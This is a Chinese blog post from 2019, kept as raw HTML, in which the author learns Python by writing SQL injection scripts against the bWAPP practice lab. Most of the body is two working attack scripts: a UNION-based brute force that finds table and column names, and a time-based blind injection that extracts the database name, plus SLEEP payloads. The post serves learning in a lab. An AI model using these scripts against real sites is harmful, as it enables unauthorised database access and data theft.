<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #FFFFFF; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>

<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.2',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="0x01 前言一直想学习python，可是老是静不下心。于是我就先定一个小目标，比如先写个盲注脚本出来吧先声明一下…………这篇文章没有什么技术含量，只是为了记录我学习python的过程，大家就权当看个热闹。。。0x02 环境搭建我使用的是朋友推荐的一款漏洞平台”bWAPP”进行测试；官网链接：https://sourceforge.net/projects/bwapp/files/latest/d">
<meta property="og:type" content="article">
<meta property="og:title" content="python之注入脚本编写">
<meta property="og:url" content="http://yoursite.com/2019/10/18/python之注入脚本编写/index.html">
<meta property="og:site_name" content="drag0n&#39;s blog">
<meta property="og:description" content="0x01 前言一直想学习python，可是老是静不下心。于是我就先定一个小目标，比如先写个盲注脚本出来吧先声明一下…………这篇文章没有什么技术含量，只是为了记录我学习python的过程，大家就权当看个热闹。。。0x02 环境搭建我使用的是朋友推荐的一款漏洞平台”bWAPP”进行测试；官网链接：https://sourceforge.net/projects/bwapp/files/latest/d">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/1.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/2.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/3.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/7.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/8.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/4.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/5.png">
<meta property="og:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/6.png">
<meta property="og:updated_time" content="2019-10-18T11:21:40.466Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="python之注入脚本编写">
<meta name="twitter:description" content="0x01 前言一直想学习python，可是老是静不下心。于是我就先定一个小目标，比如先写个盲注脚本出来吧先声明一下…………这篇文章没有什么技术含量，只是为了记录我学习python的过程，大家就权当看个热闹。。。0x02 环境搭建我使用的是朋友推荐的一款漏洞平台”bWAPP”进行测试；官网链接：https://sourceforge.net/projects/bwapp/files/latest/d">
<meta name="twitter:image" content="http://yoursite.com/2019/10/18/python之注入脚本编写/1.png">

<link rel="canonical" href="http://yoursite.com/2019/10/18/python之注入脚本编写/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>python之注入脚本编写 | drag0n's blog</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">drag0n's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">长路漫漫，唯剑作伴~~~</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/18/python之注入脚本编写/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="长路漫漫，唯剑作伴~~~">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="drag0n's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          python之注入脚本编写
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2019-10-18 17:52:35 / 修改时间：19:21:40" itemprop="dateCreated datePublished" datetime="2019-10-18T17:52:35+08:00">2019-10-18</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>一直想学习python，可是老是静不下心。于是我就先定一个小目标，比如先写个盲注脚本出来吧</p><p>先声明一下…………</p><p>这篇文章没有什么技术含量，只是为了记录我学习python的过程，大家就权当看个热闹。。。</p><h1 id="0x02-环境搭建"><a href="#0x02-环境搭建" class="headerlink" title="0x02 环境搭建"></a>0x02 环境搭建</h1><p>我使用的是朋友推荐的一款漏洞平台”bWAPP”进行测试；</p><p>官网链接：<a href="https://sourceforge.net/projects/bwapp/files/latest/download" target="_blank" rel="noopener">https://sourceforge.net/projects/bwapp/files/latest/download</a></p><a id="more"></a>




<p>下载好后，解压至自己的phpstudy目录下，并将配置文件config.inc.php中的内容修改为自己电脑的信息</p>
<p><img src="/2019/10/18/python之注入脚本编写/1.png" alt="1"></p>
<p>然后访问程序根目录下的install.php即可进行安装</p>
<p><img src="/2019/10/18/python之注入脚本编写/2.png" alt="2"></p>
<p>安装好后进入主页，输入默认密码（bee/bug）登陆，可以选择大量的漏洞环境进行练习,我这次选择的是“SQL Injection (GET/Search)”和“SQL Injection - Blind - Time-Based”</p>
<p><img src="/2019/10/18/python之注入脚本编写/3.png" alt="3"></p>
<h1 id="0x03-报错注入"><a href="#0x03-报错注入" class="headerlink" title="0x03 报错注入"></a>0x03 报错注入</h1><p>其实这个注入点根本没有写脚本的必要，只是为了练练手，毕竟只有多练习才能更好的去掌握一门语言嘛</p>
<p>进入漏洞环境，发现一个搜索电影的输入框，参数是title，并且是个注入点</p>
<p><img src="/2019/10/18/python之注入脚本编写/7.png" alt="7"></p>
<p>我的目标是使用程序将当前数据库下的所有表名及每个表下的列名爆破出来，开始动手。。。</p>
<p><strong>代码如下：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">"User-Agent"</span>:<span class="string">"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"</span>,<span class="string">"Cookie"</span>:<span class="string">"security_level=0; PHPSESSID=olj0gre29moeh6ksqsibuic1p7"</span>&#125;</span><br><span class="line">tables = [t.strip() <span class="keyword">for</span> t <span class="keyword">in</span> open(<span class="string">'tablename.txt'</span>,<span class="string">'r'</span>).readlines()] <span class="comment">#导入表名字典</span></span><br><span class="line">columns = [c.strip() <span class="keyword">for</span> c <span class="keyword">in</span> open(<span class="string">'columnsname.txt'</span>,<span class="string">'r'</span>).readlines()] <span class="comment">#导入列名字典</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tablename</span><span class="params">()</span>:</span></span><br><span class="line">    tab = []</span><br><span class="line">    print(<span class="string">"开始爆破表名!!!"</span>)</span><br><span class="line">    <span class="keyword">for</span> table <span class="keyword">in</span> tables:</span><br><span class="line">        url = <span class="string">f"http://www.bwapp.com/sqli_1.php?title=' union select 1,2,3,4,5,6,7 from <span class="subst">&#123;table&#125;</span> -- &amp;action=search"</span></span><br><span class="line">        res = requests.get(url,headers=headers)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'Error'</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tab.append(table)</span><br><span class="line">    <span class="keyword">return</span> tab</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">columnsname</span><span class="params">(tablename)</span>:</span></span><br><span class="line">    col = []</span><br><span class="line">    <span class="keyword">for</span> column <span class="keyword">in</span> columns:</span><br><span class="line">        url = <span class="string">f"http://www.bwapp.com/sqli_1.php?title=' union select 1,<span class="subst">&#123;column&#125;</span>,3,4,5,6,7 from <span class="subst">&#123;tablename&#125;</span> -- &amp;action=search"</span></span><br><span class="line">        res = requests.get(url,headers=headers)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'Error'</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            col.append(column)</span><br><span class="line">    <span class="keyword">return</span> col</span><br><span class="line">    </span><br><span class="line">tab = tablename()</span><br><span class="line">print(tab)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> tab:</span><br><span class="line">    col = columnsname(i)</span><br><span class="line">    print(<span class="string">f"\n表：<span class="subst">&#123;i&#125;</span>的列名如下："</span> + str(col))</span><br></pre></td></tr></table></figure>

<p>程序运行结果如下</p>
<p><img src="/2019/10/18/python之注入脚本编写/8.png" alt="8"></p>
<h1 id="0x04-时间盲注"><a href="#0x04-时间盲注" class="headerlink" title="0x04 时间盲注"></a>0x04 时间盲注</h1><p>进入漏洞环境，又发现一个输入框</p>
<p><img src="/2019/10/18/python之注入脚本编写/4.png" alt="4"></p>
<p>搜索框中输入注入语句’ and (select 1 from(select(sleep(3)))x) and ‘aa’ = ‘a，可以看到页面已经延迟了3秒，看来title参数就是注入点</p>
<p><img src="/2019/10/18/python之注入脚本编写/5.png" alt="5"></p>
<p>为了练练手，写个脚本进行猜解。</p>
<p>这里我踩到过一个坑，因为这个平台需要登陆后才能进行测试，所以在headers赋值的时候，一定要加上登陆成功后的cookie信息，不然每次访问都会跳转到/login.php导致无法判断注入点</p>
<p><strong>代码如下：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">name = <span class="string">''</span></span><br><span class="line"></span><br><span class="line">payloads=<span class="string">"abcdefghijklmnopqrstuvwxyz!@#$%^&amp;*()_,./"</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">"User-Agent"</span>:<span class="string">"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"</span>,<span class="string">"cookie"</span>:<span class="string">"security_level=0; PHPSESSID=13nie23h4fdbd0okt5meuqq8s3"</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line">    <span class="keyword">for</span> payload <span class="keyword">in</span> payloads:</span><br><span class="line">        url = <span class="string">f"http://www.bwapp.com/sqli_15.php?title=1' and (select 1 from(select substring((select database()) from <span class="subst">&#123;i&#125;</span> for 1)='<span class="subst">&#123;payload&#125;</span>' and sleep(3))x) and 'f' ='f&amp;action=search"</span></span><br><span class="line">        s = time.time()</span><br><span class="line">        response = requests.get(url,headers=headers)</span><br><span class="line">        s1 = time.time()</span><br><span class="line">        <span class="keyword">if</span> s1-s &gt; <span class="number">2.9</span>:</span><br><span class="line">            name += payload</span><br><span class="line">            print(<span class="string">'[+]'</span> + name)</span><br><span class="line">           </span><br><span class="line">print(<span class="string">f'\n[+]爆出的库名为：<span class="subst">&#123;name&#125;</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">url = "http://www.bwapp.com/sqli_15.php?title=1' and (select 1 from(select substring((select database()) from 1 for 1)='b' and sleep(3))x) and 'f' ='f&amp;action=search"</span></span><br><span class="line"><span class="string">payload = "' AND (SELECT 2541 FROM (SELECT(SLEEP(5)))RcGX) AND 'JkvU'='JkvU"</span></span><br><span class="line"><span class="string">start=time.time()</span></span><br><span class="line"><span class="string">response = requests.get(url,headers=headers)</span></span><br><span class="line"><span class="string">start2=time.time()</span></span><br><span class="line"><span class="string">print(start2-start)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure>

<p>附上一张代码执行后的图片</p>
<p><img src="/2019/10/18/python之注入脚本编写/6.png" alt="6"></p>
<h1 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h1><p>编写脚本的时候借鉴了一些表哥文章中的思路，我把他们的文章发到下面来，大家一起更好的去学习交流：</p>
<p><a href="https://www.t00ls.net/viewthread.php?tid=50914&amp;highlight=python" target="_blank" rel="noopener">https://www.t00ls.net/viewthread.php?tid=50914&amp;highlight=python</a></p>
<p><a href="https://www.t00ls.net/viewthread.php?tid=53226&amp;highlight=python" target="_blank" rel="noopener">https://www.t00ls.net/viewthread.php?tid=53226&amp;highlight=python</a></p>
<p><a href="https://www.t00ls.net/viewthread.php?tid=52149&amp;highlight=python" target="_blank" rel="noopener">https://www.t00ls.net/viewthread.php?tid=52149&amp;highlight=python</a></p>

    </div>

    
    
    
	
	<div>
	<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
	</div>
	

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/10/12/一次有趣的mssql注入/" rel="next" title="一次有趣的mssql注入">
                  <i class="fa fa-chevron-left"></i> 一次有趣的mssql注入
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/11/01/XXE漏洞学习/" rel="prev" title="XXE漏洞学习">
                  XXE漏洞学习 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-前言"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-环境搭建"><span class="nav-number">2.</span> <span class="nav-text">0x02 环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-报错注入"><span class="nav-number">3.</span> <span class="nav-text">0x03 报错注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-时间盲注"><span class="nav-number">4.</span> <span class="nav-text">0x04 时间盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#写在最后"><span class="nav-number">5.</span> <span class="nav-text">写在最后</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="site-author-image" itemprop="image" alt=""
    src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name"></p>
  <div class="site-description" itemprop="description">长路漫漫，唯剑作伴~~~</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder"></span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.4.2
  </div>
-->

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

        












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  


















  

  

  

  <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
<!-- 背景动画 -->
<script type="text/javascript" src="/js/src/particle.js"></script>
</body>
</html>
